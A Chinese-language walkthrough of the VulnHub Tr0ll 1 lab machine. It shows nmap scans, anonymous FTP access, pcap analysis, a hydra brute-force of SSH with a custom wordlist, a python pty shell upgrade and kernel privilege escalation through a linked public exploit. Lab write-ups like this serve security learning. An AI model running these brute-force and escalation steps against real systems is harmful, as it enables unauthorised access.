Tr0ll靶机笔记
概述
靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/
这台靶机比较简单,包含ftp的渗透,pcap流量包的分析,常规的web渗透和系统内核提权。让我们开始吧 Hack it!
一、nmap扫描
1、端口扫描
sudo nmap -sT --min-rate 10000 -p- 192.168.52.6 -o ports
Nmap scan report for 192.168.52.6
Host is up (0.0026s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:E4:03:EB (VMware)Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
看到开放了21,22,80三个服务
2、详细信息扫描
sudo nmap -sT -sV -sC -p21,22,80 -O 192.168.52.6 -o details
Nmap scan report for 192.168.52.6
Host is up (0.00060s latency).PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.52.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap [NSE: writeable]
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d618d9ef75d31c29be14b52b1854a9c0 (DSA)
| 2048 ee8c64874439538c24fe9d39a9adeadb (RSA)
| 256 0e66e650cf563b9c678b5f56caae6bf4 (ECDSA)
|_ 256 b28be2465ceffddc72f7107e045f2585 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:E4:03:EB (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds
有 ftp-anon: Anonymous FTP login allowed (FTP code 230)
看到ftp是允许匿名访问的
3、漏洞脚本扫描
sudo nmap --script=vuln -p21,22,80 192.168.52.6 -o vuln
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
| /robots.txt: Robots file
|_ /secret/: Potentially interesting folder
|_http-csrf: Couldn't find any CSRF vulnerabilities.
MAC Address: 00:0C:29:E4:03:EB (VMware)Nmap done: 1 IP address (1 host up) scanned in 321.47 seconds
二、FTP渗透
从nmap扫描我们得知:FTP服务是可以匿名访问的。我们连接看有没有什么感兴趣的信息透露给我们
ftp 192.168.52.6
看到我们成功用anonymous匿名登陆成功,看到一个lol.pcap的流量包文件。
ftp> binary
200 Switching to Binary mode.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
229 Entering Extended Passive Mode (|||15971|).
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
100% |**************************************************************************************| 8068 1.18 MiB/s 00:00 ETA
226 Transfer complete.
8068 bytes received in 00:00 (1.05 MiB/s)
切换到binary模式,下载下来
我们用wireshark对流量包分析
发现了,有文件传输,我们可以看到文件内容
Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛
Sucks, you were so close… gotta TRY HARDER!
三、web渗透
打开80端口看一看
只有一张图片,图片的右下角有一个域名quickmeme.com,
下载下来分析一下
确实是jpg的图像文件
exif也没有敏感信息
想到ftp渗透过程中我们发现的一个路径sup3rs3cr3tdirlol ,拼接看一下
http://192.168.52.6/sup3rs3cr3tdirlol/
看到一个名为roflmao的文件,下载下来
看到是一个linux系统的可执行文件。
给执行权限,运行看看。
这里因为是靶机,我就直接在自己的kali机器上执行了。在真实的情况下,这个文件有可能是蓝队用于反制的文件,我们要经过逆向程序的分析,研判后,在一台新的linux虚拟机上运行,以免打到蓝队的蜜罐。
他说找到0x0856BF地址,第一反应肯定是认为这会不会是一个缓冲区溢出漏洞,但可惜他不是,他是一个url地址
http://192.168.52.6/0x0856BF/
我们在里面找到了两个文件
which_one_lol.txt
Pass.txt
添加用户名genphlux
四、获得立足点
用hydra尝试爆破ssh和ftp服务
hydra -L which_one_lol.txt -P Pass.txt ssh://192.168.52.6
没有,再看看ftp服务
hydra -L which_one_lol.txt -P Pass.txt ftp://192.168.52.6
还是没有
密码就一个,我们在里面多添加一点,把用户名文件,目录名和文件名,以及常见的弱口令添加进去
最终构造的字典
cat Pass.txt
Good_job_:)
maleus
ps-aux
felux
Eagle11
genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow
Pass.txt
Pass
which_one_lol.txt
which_one_lol
0x0856BF
roflmao
sup3rs3cr3tdirlol
quickmeme.com
quickmeme
再次尝试爆破
hydra -L which_one_lol.txt -P Pass.txt ssh://192.168.52.6 -t 4
过了大概有10分钟,终于爆破成功了
我们ssh登陆进去
提升交互性
python -c 'import pty;pty.spawn("/bin/bash")'
过段时间被踢出shell了
五、提权
uname -a
看到版本3.13.0-32-generic,google搜一下
找到利用:https://www.exploit-db.com/exploits/37292
启动web服务,上传到靶机
编译,运行,成功提权到root
Happy Hacking~
)
 : 含有大模型生成的公式的文本渲染成图片并生成word文档(支持flask接口调用))
【远程操作 | 理解分布式 | 推送拉取远程仓库 | 标签管理】)
)
